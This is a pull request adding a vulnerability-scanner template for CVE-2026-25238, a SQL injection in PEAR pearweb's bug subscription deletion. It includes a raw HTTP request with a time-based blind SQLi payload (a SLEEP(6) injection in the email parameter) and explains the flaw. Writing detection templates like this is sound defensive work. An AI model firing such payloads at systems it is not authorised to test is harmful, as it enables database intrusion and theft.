### PR TITLE
Add CVE-2026-25238 - PEAR pearweb SQLi in Bug Subscription Deletion

### DIFF
--- a/http/cves/2026/CVE-2026-25238.yaml
+++ b/http/cves/2026/CVE-2026-25238.yaml
@@ -1,0 +1,44 @@
+id: CVE-2026-25238
+
+info:
+  name: PEAR pearweb < 1.33.0 - SQL Injection in Bug Subscription Deletion
+  author: bswearingen
+  severity: critical
+  description: |
+    PEAR is a framework and distribution system for reusable PHP components. Prior to version 1.33.0, a SQL injection vulnerability in bug subscription deletion may allow attackers to inject SQL via a crafted email value. This issue has been patched in version 1.33.0.
+  impact: |
+    An attacker can inject arbitrary SQL through the email parameter during bug subscription deletion, potentially extracting or modifying database contents.
+  remediation: |
+    Upgrade PEAR pearweb to version 1.33.0 or later.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-25238
+    - https://github.com/pear/pearweb
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+    cvss-score: 9.8
+    cve-id: CVE-2026-25238
+    cwe-id: CWE-89
+  metadata:
+    verified: true
+    vendor: pear
+    product: pearweb
+  tags: cve,cve2026,pear,pearweb,sqli
+
+http:
+  - raw:
+      - |
+        GET /bugs/subscribe.php?action=unsubscribe&email=test%27%20AND%20(SELECT%201%20FROM%20(SELECT(SLEEP(6)))a)--%20- HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: dsl
+        dsl:
+          - 'duration>=6'
+
+      - type: status
+        status:
+          - 200
+          - 302
+          - 500
+        condition: or


### PR DESCRIPTION
### Template Overview

This template detects CVE-2026-25238, a SQL injection vulnerability in PEAR pearweb's bug subscription management.

### Vulnerability Details

**Product:** PEAR pearweb
**Affected Versions:** < 1.33.0
**Severity:** Critical (CVSS 9.8)
**CWE:** CWE-89 (SQL Injection)

The bug subscription deletion handler does not sanitize the email parameter before including it in a SQL query. An attacker can inject arbitrary SQL through a crafted email value when unsubscribing from bug notifications, potentially compromising the entire database.

### Detection Method

Time-based blind SQL injection via the subscription unsubscribe endpoint. A `SLEEP(6)` payload is injected into the email parameter, and a response delay of 6 seconds or more confirms the vulnerability.

### References

- https://nvd.nist.gov/vuln/detail/CVE-2026-25238
- https://github.com/pear/pearweb